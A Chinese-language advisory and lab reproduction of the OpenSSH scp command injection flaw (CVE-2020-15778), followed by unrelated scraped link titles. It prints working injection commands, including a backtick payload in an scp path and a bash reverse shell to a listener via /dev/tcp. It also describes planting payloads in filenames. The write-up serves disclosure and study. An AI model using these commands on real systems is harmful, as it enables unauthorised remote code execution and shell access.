一、漏洞概要

2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。

二、漏洞分析

2.1 OpenSSH介绍

OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。

2.2 漏洞描述

研究人员Chinmay Pandya在openssh的scp组件中发现了一个命令注入漏洞。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。

2.2.1 scp命令简介

scp 是 secure copy 的缩写。在linux系统中,scp用于linux之间复制文件和目录,基于 ssh 登陆进行安全的远程文件拷贝命令。该命令由openssh的scp.c及其他相关代码实现。

2.2.2 漏洞复现

查看ssh版本吧

ssh -V

首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件。

scp 1.txt root@192.168.110.153:'`touch /tmp/test.txt` /tmp'

成功将kali上面的文件传入道centOS上面,和自己创建了文件。

直接进行nc反弹获取shell

先监听一个端口

nc -lvvp 7777

进行反弹shell

scp test.txt root@192.168.110.153:'`bash -i >& /dev/tcp/192.168.110.134/7777 0>&1`/tmp/test1.txt'

利用方案

  • 对于用户来说,ssh被阻止,但authorized_keys文件中的命令选项允许使用scp的情况。您可以绕过此限制并在远程服务器上执行命令。
  • SCP支持带有“ -r”选项的目录传输。由于linux允许在文件名中使用反引号(`)。攻击者可以在文件名中创建有效载荷,并且当受害者将完整文件夹复制到远程服务器时,将执行文件名中的有效载荷。

总结

该漏洞复现简单,漏洞等级 严重。复现需要知道ssh密码,主要针对知道ssh密码却不给登录,这样就可进行反弹shell获取权限了。

参考:

https://www.cnblogs.com/hcrk/p/13495626.html

https://www.freebuf.com/vuls/245225.html

https://github.com/cpandya2909/CVE-2020-15778/

OpenSSH 命令注入漏洞通告(CVE-2020-15778,Openssh <=8.3p1)相关推荐

  1. openssh漏洞_技术干货 | OpenSSH命令注入漏洞复现(CVE202015778)

    本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 欢迎各位添加 ...

  2. openssh漏洞_漏洞预警 | OpenSSH 命令注入漏洞

    0x00  漏洞编号 CVE-2020-15778 0x01 危险等级 高危 0x02 漏洞概述 OpenSSH 8.3 p1及之前版本中的scp的scp.c文件存在命令注入漏洞.该漏洞源于外部输入数 ...

  3. CVE-2022-33891:Apache Spark 命令注入漏洞通告

    0x01   漏洞简述 2022年07月19日,Apache官方发布了Apache Spark的风险通告,漏洞编号为CVE-2022-33891,漏洞等级:中危,漏洞评分:6.5. Apache Sp ...

  4. OpenSSH升级8.5版本rpm包制作过程及安装。OpenSSH 命令注入漏洞

    OpenSSH升级8.5版本 3月3日OpenSSH官方发布最新版OpenSSH8.5,此次更新修复了之前版本存在的注入漏洞.用源码编译的方式比较慢 而且需要相关的依赖特别的多,而且公司一般都是内网环 ...

  5. OpenSSH 命令注入漏洞(CVE-2020-15778)

    该漏洞为SCP命令引起 可以禁用scp,改用rsync等缓解风险(可能会导致小文件机器内拷贝变慢) 目前官方最新版openssh仍然存在该漏洞,所以需要卸载scp命令. yum remove open ...

  6. 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)

    OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...

  7. Ubiquiti几十款无线产品爆出命令注入漏洞 是因为没有升级老版本的PHP 据说厂商还未给出补丁...

    Ubiquiti Networks公司提供的几十款产品中存在紧急漏洞,该漏洞可用于劫持设备.这个漏洞已于11月上报给了该厂商,但目前厂商尚未发布补丁修复大多数受影响的设备. 命令注入漏洞来自于没有升级 ...

  8. kylin源码调试_Apache Kylin 命令注入漏洞调试分析(CVE-2020-1956)

    原标题:Apache Kylin 命令注入漏洞调试分析(CVE-2020-1956) 1.前言 Apache Kylin是一个开源的.分布式的分析型数据仓库,提供Hadoop/Spark 之上的 SQ ...

  9. java 漏洞挖掘_Apache Tika命令注入漏洞挖掘

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...

最新文章

  1. wordpress主题wp-office2010初版
  2. python整数类型-Python整数类型及其运算
  3. 【Java 并发编程】线程锁机制 ( 锁的四种状态 | 无锁状态 | 偏向锁 | 轻量级锁 | 重量级锁 | 锁竞争 | 锁升级 )
  4. SFB 项目经验-57-Skype for business-录音系统-你拥有吗(模拟线路)
  5. Y1066 Ble Master Client 记录
  6. linux检查网络是否通畅_网络基础Ping命令详解(使用Ping这命令来测试网络连通)...
  7. 少儿德国奎尔鱼油(QÜELL FISH OIL FOR JUNIOR )
  8. 妙用javascript
  9. Python实现线性反馈移位寄存器实例信息安全导论期中小作业
  10. php万能表单制作教程,万能表单 · 极致CMS建站系统帮助文档 · 看云
  11. Android studio 解决Gradle下载缓慢的问题
  12. pppoe网络无法使用 zmap
  13. ImageJ 插入插件和基本教程
  14. rsa_eay_private_encrypt
  15. 快速排序的时间复杂度和空间复杂度
  16. mac 重置 android手机系统,Mac OS X下Android系统华为手机无法连接问题之解决方案
  17. Knol of Fabio Maulo
  18. 交叉编译xorg-server
  19. 笔记本电脑睡眠或休眠无法唤醒怎么办?
  20. 腾讯百度之间地图经纬度的转换

热门文章

  1. 安装cleanmymac软件提示已损坏无法打开,如何解决?
  2. 1.5编程基础之循环控制_16买房子
  3. 《小学生C++趣味编程》 第23课 打车费用
  4. RTX5 | 时间延时
  5. 数字系统设计学习之QuartusII9的安装
  6. 移动端点击拉起输入_没广告、无捆绑、真清流!讯飞输入法PC版评测:跨屏语音动口不动手...
  7. kafka key的作用_kafka系列(kafka端到端原理分析)
  8. Python笔记-相关性分析(连续变量和分类变量)
  9. Python笔记-安装python虚拟环境及配置opencv及通过opencv识别颜色
  10. 前端笔记-thymeleaf获取及回显select数据(combox)